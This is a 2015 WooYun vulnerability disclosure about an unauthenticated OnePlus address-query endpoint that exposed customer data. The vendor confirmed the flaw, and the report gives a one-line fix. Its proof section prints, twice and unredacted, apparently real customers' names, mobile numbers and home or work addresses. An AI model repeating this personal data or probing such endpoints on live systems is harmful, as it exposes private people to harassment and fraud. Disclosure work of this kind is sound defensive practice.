当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117831

漏洞标题:一加某处越权导致用户敏感信息泄露

相关厂商:oneplus.cn

漏洞作者: del0xphy

提交时间:2015-06-03 09:21

修复时间:2015-07-20 11:08

公开时间:2015-07-20 11:08

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

脚本中发现某网址,访问后发现能访问获取用户姓名,手机号,地址

详细说明:

存在问题的网址:http://www.oneplus.cn/user/addr/query
访问后得到的信息:

{"data":[{"addrId":402103,"alias":null,"areaId":440604,"areaName":"禅城区","cityId":4406,"cityName":"佛山市","createTime":"2015-06-02 19:44:09","currentPage":1,"detail":"汾江中路121号东建大厦25楼前台","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13902417933","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"梁志刚","startDate":null,"streetId":440604012,"streetName":"祖庙街道","updateTime":"2015-06-02 19:44:09","userId":1663172,"warehouseName":null},{"addrId":402102,"alias":null,"areaId":230102,"areaName":"道里区","cityId":2301,"cityName":"哈尔滨市","createTime":"2015-06-02 19:36:40","currentPage":1,"detail":"哈市道里区新榆路101号二手车市场检车站对面源通私家车","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13936273159","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":23,"provinceName":"黑龙江省","queryType":null,"receiver":"王呈阳","startDate":null,"streetId":230102104,"streetName":"榆树镇","updateTime":"2015-06-02 19:36:40","userId":1663166,"warehouseName":null},{"addrId":402101,"alias":null,"areaId":450125,"areaName":"上林县","cityId":4501,"cityName":"南宁市","createTime":"2015-06-02 19:21:59","currentPage":1,"detail":"广西壮族自治区南宁市上林县三里镇南湖街132号","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13768493076","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":45,"provinceName":"广西壮族自治区","queryType":null,"receiver":"覃耐泽","startDate":null,"streetId":450125104,"streetName":"三里镇","updateTime":"2015-06-02 19:21:59","userId":1663160,"warehouseName":null},{"addrId":402098,"alias":null,"areaId":440605,"areaName":"南海区","cityId":4406,"cityName":"佛山市","createTime":"2015-06-02 18:52:49","currentPage":1,"detail":"佛山罗村兴朗中路23号(加得电子厂)","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13452967722","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"郭东林","startDate":null,"streetId":440605124,"streetName":"狮山镇","updateTime":"2015-06-02 18:52:49","userId":1663147,"warehouseName":null},{"addrId":399203,"alias":null,"areaId":440605,"areaName":"南海区","cityId":4406,"cityName":"佛山市","createTime":"2015-05-20 15:31:26","currentPage":1,"detail":"广东省公安民警培训中心保安部","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13728519664","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"龚杰","startDate":null,"streetId":440605124,"streetName":"狮山镇","updateTime":"2015-06-02 18:45:27","userId":1628949,"warehouseName":null},{"addrId":402097,"alias":null,"areaId":500108,"areaName":"南岸区","cityId":5001,"cityName":"重庆市","createTime":"2015-06-02 18:43:41","currentPage":1,"detail":"南坪东路11号星宇花园C栋1单元10-1","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15156529909","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":50,"provinceName":"重庆","queryType":null,"receiver":"王芳","startDate":null,"streetId":500108003,"streetName":"南坪街道","updateTime":"2015-06-02 18:43:41","userId":1663144,"warehouseName":null},{"addrId":402095,"alias":null,"areaId":510112,"areaName":"龙泉驿区","cityId":5101,"cityName":"成都市","createTime":"2015-06-02 18:39:17","currentPage":1,"detail":"驿都西路288号四川财经职业学院","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13678083812","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":51,"provinceName":"四川省","queryType":null,"receiver":"何晨","startDate":null,"streetId":510112002,"streetName":"大面街道","updateTime":"2015-06-02 18:39:17","userId":602391,"warehouseName":null},{"addrId":297426,"alias":null,"areaId":320507,"areaName":"相城区","cityId":3205,"cityName":"苏州市","createTime":"2014-10-07 10:16:30","currentPage":1,"detail":"春丰路陈大房","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13160100019","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":32,"provinceName":"江苏省","queryType":null,"receiver":"吴小虎","startDate":null,"streetId":320507102,"streetName":"黄埭镇","updateTime":"2015-06-02 18:36:41","userId":1417569,"warehouseName":null},{"addrId":397169,"alias":null,"areaId":440304,"areaName":"福田区","cityId":4403,"cityName":"深圳市","createTime":"2015-05-12 16:49:59","currentPage":1,"detail":"电子科技大厦C座43B1","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15914012187","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"杜培根","startDate":null,"streetId":440304011,"streetName":"华强北街道","updateTime":"2015-06-02 18:33:51","userId":1202091,"warehouseName":null},{"addrId":402094,"alias":null,"areaId":340207,"areaName":"鸠江区","cityId":3402,"cityName":"芜湖市","createTime":"2015-06-02 18:24:10","currentPage":1,"detail":"疯狂减肥了啊","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"12345678900","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":34,"provinceName":"安徽省","queryType":null,"receiver":"周俊杰","startDate":null,"streetId":340207003,"streetName":"官陡街道","updateTime":"2015-06-02 18:24:10","userId":1569510,"warehouseName":null},{"addrId":334876,"alias":null,"areaId":440305,"areaName":"南山区","cityId":4403,"cityName":"深圳市","createTime":"2014-12-17 12:20:09","currentPage":1,"detail":"深南花园B栋9E","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13058119622","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"徐志军","startDate":null,"streetId":440305007,"streetName":"粤海街道","updateTime":"2015-06-02 18:12:45","userId":1236806,"warehouseName":null},{"addrId":402092,"alias":null,"areaId":310115,"areaName":"浦东新区","cityId":3101,"cityName":"上海市","createTime":"2015-06-02 18:10:27","currentPage":1,"detail":"上海市浦东新区新港镇桃园村4组812号","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15221146163","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":31,"provinceName":"上海","queryType":null,"receiver":"刘琳","startDate":null,"streetId":310115142,"streetName":"书院镇","updateTime":"2015-06-02 18:10:27","userId":1440157,"warehouseName":null},{"addrId":402091,"alias":null,"areaId":440307,"areaName":"龙岗区","cityId":4403,"cityName":"深圳市","createTime":"2015-06-02 18:10:20","currentPage":1,"detail":"富民工业区59栋A1楼新昌晶鑫金属制品有限公司","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13825779287","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"罗晖","startDate":null,"streetId":440307003,"streetName":"平湖街道","updateTime":"2015-06-02 18:10:20","userId":1663133,"warehouseName":null},{"addrId":402090,"alias":null,"areaId":441302,"areaName":"惠城区","cityId":4413,"cityName":"惠州市","createTime":"2015-06-02 18:09:36","currentPage":1,"detail":"广东省惠州市陈江镇吉山村邮局旁","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15811997366","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"陈明强","startDate":null,"streetId":441302008,"streetName":"陈江街道","updateTime":"2015-06-02 18:09:36","userId":1663126,"warehouseName":null},{"addrId":402089,"alias":null,"areaId":510114,"areaName":"新都区","cityId":5101,"cityName":"成都市","createTime":"2015-06-02 18:08:02","currentPage":1,"detail":"新都大道8号西南石油大学","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"18382240423","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":51,"provinceName":"四川省","queryType":null,"receiver":"陈令","startDate":null,"streetId":510114100,"streetName":"新都镇","updateTime":"2015-06-02 18:08:02","userId":1663131,"warehouseName":null}],"defaultData":null,"errCode":null,"errMsg":null,"page":null,"ret":"1"}

漏洞证明:

{"data":[{"addrId":402103,"alias":null,"areaId":440604,"areaName":"禅城区","cityId":4406,"cityName":"佛山市","createTime":"2015-06-02 19:44:09","currentPage":1,"detail":"汾江中路121号东建大厦25楼前台","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13902417933","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"梁志刚","startDate":null,"streetId":440604012,"streetName":"祖庙街道","updateTime":"2015-06-02 19:44:09","userId":1663172,"warehouseName":null},{"addrId":402102,"alias":null,"areaId":230102,"areaName":"道里区","cityId":2301,"cityName":"哈尔滨市","createTime":"2015-06-02 19:36:40","currentPage":1,"detail":"哈市道里区新榆路101号二手车市场检车站对面源通私家车","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13936273159","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":23,"provinceName":"黑龙江省","queryType":null,"receiver":"王呈阳","startDate":null,"streetId":230102104,"streetName":"榆树镇","updateTime":"2015-06-02 19:36:40","userId":1663166,"warehouseName":null},{"addrId":402101,"alias":null,"areaId":450125,"areaName":"上林县","cityId":4501,"cityName":"南宁市","createTime":"2015-06-02 19:21:59","currentPage":1,"detail":"广西壮族自治区南宁市上林县三里镇南湖街132号","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13768493076","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":45,"provinceName":"广西壮族自治区","queryType":null,"receiver":"覃耐泽","startDate":null,"streetId":450125104,"streetName":"三里镇","updateTime":"2015-06-02 19:21:59","userId":1663160,"warehouseName":null},{"addrId":402098,"alias":null,"areaId":440605,"areaName":"南海区","cityId":4406,"cityName":"佛山市","createTime":"2015-06-02 18:52:49","currentPage":1,"detail":"佛山罗村兴朗中路23号(加得电子厂)","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13452967722","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"郭东林","startDate":null,"streetId":440605124,"streetName":"狮山镇","updateTime":"2015-06-02 18:52:49","userId":1663147,"warehouseName":null},{"addrId":399203,"alias":null,"areaId":440605,"areaName":"南海区","cityId":4406,"cityName":"佛山市","createTime":"2015-05-20 15:31:26","currentPage":1,"detail":"广东省公安民警培训中心保安部","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13728519664","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"龚杰","startDate":null,"streetId":440605124,"streetName":"狮山镇","updateTime":"2015-06-02 18:45:27","userId":1628949,"warehouseName":null},{"addrId":402097,"alias":null,"areaId":500108,"areaName":"南岸区","cityId":5001,"cityName":"重庆市","createTime":"2015-06-02 18:43:41","currentPage":1,"detail":"南坪东路11号星宇花园C栋1单元10-1","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15156529909","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":50,"provinceName":"重庆","queryType":null,"receiver":"王芳","startDate":null,"streetId":500108003,"streetName":"南坪街道","updateTime":"2015-06-02 18:43:41","userId":1663144,"warehouseName":null},{"addrId":402095,"alias":null,"areaId":510112,"areaName":"龙泉驿区","cityId":5101,"cityName":"成都市","createTime":"2015-06-02 18:39:17","currentPage":1,"detail":"驿都西路288号四川财经职业学院","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13678083812","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":51,"provinceName":"四川省","queryType":null,"receiver":"何晨","startDate":null,"streetId":510112002,"streetName":"大面街道","updateTime":"2015-06-02 18:39:17","userId":602391,"warehouseName":null},{"addrId":297426,"alias":null,"areaId":320507,"areaName":"相城区","cityId":3205,"cityName":"苏州市","createTime":"2014-10-07 10:16:30","currentPage":1,"detail":"春丰路陈大房","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13160100019","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":32,"provinceName":"江苏省","queryType":null,"receiver":"吴小虎","startDate":null,"streetId":320507102,"streetName":"黄埭镇","updateTime":"2015-06-02 18:36:41","userId":1417569,"warehouseName":null},{"addrId":397169,"alias":null,"areaId":440304,"areaName":"福田区","cityId":4403,"cityName":"深圳市","createTime":"2015-05-12 16:49:59","currentPage":1,"detail":"电子科技大厦C座43B1","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15914012187","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"杜培根","startDate":null,"streetId":440304011,"streetName":"华强北街道","updateTime":"2015-06-02 18:33:51","userId":1202091,"warehouseName":null},{"addrId":402094,"alias":null,"areaId":340207,"areaName":"鸠江区","cityId":3402,"cityName":"芜湖市","createTime":"2015-06-02 18:24:10","currentPage":1,"detail":"疯狂减肥了啊","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"12345678900","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":34,"provinceName":"安徽省","queryType":null,"receiver":"周俊杰","startDate":null,"streetId":340207003,"streetName":"官陡街道","updateTime":"2015-06-02 18:24:10","userId":1569510,"warehouseName":null},{"addrId":334876,"alias":null,"areaId":440305,"areaName":"南山区","cityId":4403,"cityName":"深圳市","createTime":"2014-12-17 12:20:09","currentPage":1,"detail":"深南花园B栋9E","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13058119622","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":"","postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"徐志军","startDate":null,"streetId":440305007,"streetName":"粤海街道","updateTime":"2015-06-02 18:12:45","userId":1236806,"warehouseName":null},{"addrId":402092,"alias":null,"areaId":310115,"areaName":"浦东新区","cityId":3101,"cityName":"上海市","createTime":"2015-06-02 18:10:27","currentPage":1,"detail":"上海市浦东新区新港镇桃园村4组812号","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15221146163","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":31,"provinceName":"上海","queryType":null,"receiver":"刘琳","startDate":null,"streetId":310115142,"streetName":"书院镇","updateTime":"2015-06-02 18:10:27","userId":1440157,"warehouseName":null},{"addrId":402091,"alias":null,"areaId":440307,"areaName":"龙岗区","cityId":4403,"cityName":"深圳市","createTime":"2015-06-02 18:10:20","currentPage":1,"detail":"富民工业区59栋A1楼新昌晶鑫金属制品有限公司","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"13825779287","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"罗晖","startDate":null,"streetId":440307003,"streetName":"平湖街道","updateTime":"2015-06-02 18:10:20","userId":1663133,"warehouseName":null},{"addrId":402090,"alias":null,"areaId":441302,"areaName":"惠城区","cityId":4413,"cityName":"惠州市","createTime":"2015-06-02 18:09:36","currentPage":1,"detail":"广东省惠州市陈江镇吉山村邮局旁","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"15811997366","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":44,"provinceName":"广东省","queryType":null,"receiver":"陈明强","startDate":null,"streetId":441302008,"streetName":"陈江街道","updateTime":"2015-06-02 18:09:36","userId":1663126,"warehouseName":null},{"addrId":402089,"alias":null,"areaId":510114,"areaName":"新都区","cityId":5101,"cityName":"成都市","createTime":"2015-06-02 18:08:02","currentPage":1,"detail":"新都大道8号西南石油大学","endDate":null,"isDefault":1,"isDeleted":null,"lastUsedTime":null,"logId":null,"mobile":"18382240423","operIP":null,"operId":null,"operName":null,"operType":null,"pageSize":15,"phone":null,"postCode":null,"provinceId":51,"provinceName":"四川省","queryType":null,"receiver":"陈令","startDate":null,"streetId":510114100,"streetName":"新都镇","updateTime":"2015-06-02 18:08:02","userId":1663131,"warehouseName":null}],"defaultData":null,"errCode":null,"errMsg":null,"page":null,"ret":"1"}

修复方案:

访问权限做限制

版权声明:转载请注明来源 del0xphy@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-06-05 11:07

厂商回复:

非常感谢您的报告,问题已着手处理,感谢对一加业务安全的关注!

最新状态:

暂无

漏洞评价:

评论